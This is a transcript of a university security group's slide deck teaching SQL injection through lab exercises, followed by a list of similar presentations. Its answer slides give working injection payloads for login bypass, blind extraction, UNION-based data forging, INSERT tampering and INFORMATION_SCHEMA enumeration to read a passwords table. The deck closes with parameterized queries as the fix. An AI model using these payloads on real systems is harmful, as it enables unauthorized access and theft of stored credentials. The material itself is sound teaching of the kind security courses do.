Presentation is loading. Please wait.

Presentation is loading. Please wait.

WEB SECURITY WEEK 2 Computer Security Group University of Texas at Dallas.

Published byShanon Williams Modified over 9 years ago

Similar presentations

Presentation on theme: "WEB SECURITY WEEK 2 Computer Security Group University of Texas at Dallas."— Presentation transcript:

1 WEB SECURITY WEEK 2 Computer Security Group University of Texas at Dallas

2 SQL Injection

3 Overview  Injection attacks – user takes advantage of poor input sanitization to insert data into the client application that is passed (and trusted) to a server application  SQL injection – users exploits the trust that the database engine has in the web server by giving the web server data that alters a query  Another injection is command injection – targets system process execution

4 Example  To select a user: SELECT * from users WHERE name = 'Bob';  The username is determined at runtime, so let’s make it: SELECT * from users WHERE name = '$name';  For example, if $name is “Joe”: SELECT * from users WHERE name = 'Joe';

5 Attack  Let’s give it a string that will change the query once substituted into it.  Attack string is: ' or '1' = '1  When plugged into the query, the following is produced: SELECT * from users where NAME ='' or '1'='1';  This always returns a row

6 Demo  10.176.169.7/web_demo/week2/welcome1.html

7 Answers  User: admin  Password: p' OR '1'='1

8 Blind Injection  Only returns True or False.  Used to discover information about entries.

9 Demo  10.176.169/web_demo/week2/welcome1.html

10 Answers  User: admin  Password: ' OR pass LIKE 't%  Repeat for further characters.  Usually Scripted

11 UNION SELECT  SELECT money from users where id = $id;  We control the $id variable  Utilize UNION to forge our own data: 0 UNION SELECT 1000000  Resulting query: SELECT money from users where id = 0 UNION SELECT 1000000;

12 Demo  10.176.169.7/web_demo/week2/welcome1.html

13 Answers  User: any1  Password: ' UNION SELECT 'admin', 'any2

14 Table Modification  Previously we exploited SELECT this exploits INSERT.  INSERT INTO users VALUES (“string1”, “string2”)

15 Demo  10.176.169.7/web_demo/week2/welcome3.html

16 Answers  User: any  Password: pass', 1);--

17 Table Traversal  In MYSQL there is a static table called INFORMATION_SCHEMA  This reveals information about other tables.  Combine with UNION SELECT to get other tables.

18 Demo  10.176.169.7/web_demo/week2/welcome2.html

19 Answers  Username: newb  Password: ' UNION SELECT TABLE_NAME, 0 FROM INFORMATION_SCHEMA.TABLES;--  Username: newb  Password: ' UNION SELECT COLUMN_NAME, 0 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='passwords  Quest Hint: ' UNION SELECT pass, name FROM passwords;--

20 The Final Quest  10.176.169.7/web_demo/week2/welcome2.html  Find the secret flag.

21 Mitigation  Parameterized queries. In PHP:  Stupid way: $db->query(“select user where id = $id”);  Smart way: $db->prepare(“select user where id = :id”); $db->execute(array(‘:id’ => $id));  This is better because the DB doesn’t need to trust the web server since the actual query doesn’t change  DON’T FILTER, USE PREPARED STATEMENTS / PARAMETERIZED QUERIES

22 END  End of Week 2

Download ppt "WEB SECURITY WEEK 2 Computer Security Group University of Texas at Dallas."

Similar presentations

Copyright © 2003 Pearson Education, Inc. Slide 8-1 The Web Wizards Guide to PHP by David Lash.

Copyright © 2003 Pearson Education, Inc. Slide 8-1 The Web Wizards Guide to PHP by David Lash.
PHP and MySQL Database. Connecting to MySQL Note: you need to make sure that you have MySQL software properly installed on your computer before you attempt.

PHP and MySQL Database. Connecting to MySQL Note: you need to make sure that you have MySQL software properly installed on your computer before you attempt.
Introduction The concept of “SQL Injection”

Introduction The concept of “SQL Injection”
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.

By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu 15 708 33 Ostrava-Poruba.

NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu Ostrava-Poruba.
1. What is SQL Injection 2. Different varieties of SQL Injection 3. How to prevent it.

1. What is SQL Injection 2. Different varieties of SQL Injection 3. How to prevent it.
LCT2506 Internet 2 Further SQL Stored Procedures.

LCT2506 Internet 2 Further SQL Stored Procedures.
07 December 2009Slide 1 of 1207 December 2009Slide 1 of 12 SQL Injection Primer By Nicole Gray, Cliff McCullough, Joe Hernandez.

07 December 2009Slide 1 of 1207 December 2009Slide 1 of 12 SQL Injection Primer By Nicole Gray, Cliff McCullough, Joe Hernandez.
Database Connectivity Rose-Hulman Institute of Technology Curt Clifton.

Database Connectivity Rose-Hulman Institute of Technology Curt Clifton.
Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.

Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.
WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand.

WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand.
{ Code Injection Cable Johnson.  Overview  Common Injection Types  Developer Prevention Code Injection.

{ Code Injection Cable Johnson.  Overview  Common Injection Types  Developer Prevention Code Injection.
1 IS 2150 / TEL 2810 Introduction to Security James Joshi Associate Professor, SIS Lecture 12.1 Nov 20, 2012 SQL Injection Cross-Site Scripting.

1 IS 2150 / TEL 2810 Introduction to Security James Joshi Associate Professor, SIS Lecture 12.1 Nov 20, 2012 SQL Injection Cross-Site Scripting.
Check That Input Preventing SQL Injection Attacks By Andrew Morton For CS 410.

Check That Input Preventing SQL Injection Attacks By Andrew Morton For CS 410.
MIS 5211.001 Week 11 Site:

MIS Week 11 Site:
Analysis of SQL injection prevention using a proxy server By: David Rowe Supervisor: Barry Irwin.

Analysis of SQL injection prevention using a proxy server By: David Rowe Supervisor: Barry Irwin.
How to Hack a Database.  What is SQL?  Database Basics  SQL Insert Basics  SQL Select Basics  SQL Where Basics  SQL AND & OR Basics  SQL Update.

How to Hack a Database.  What is SQL?  Database Basics  SQL Insert Basics  SQL Select Basics  SQL Where Basics  SQL AND & OR Basics  SQL Update.
CSCI 6962: Server-side Design and Programming Secure Web Programming.

CSCI 6962: Server-side Design and Programming Secure Web Programming.
Copyright © 2003 Pearson Education, Inc. Slide 8-1 The Web Wizard’s Guide to PHP by David Lash.

Copyright © 2003 Pearson Education, Inc. Slide 8-1 The Web Wizard’s Guide to PHP by David Lash.
1 PHP and MySQL. 2 Topics  Querying Data with PHP  User-Driven Querying  Writing Data with PHP and MySQL PHP and MySQL.

1 PHP and MySQL. 2 Topics  Querying Data with PHP  User-Driven Querying  Writing Data with PHP and MySQL PHP and MySQL.

Similar presentations

Ads by Google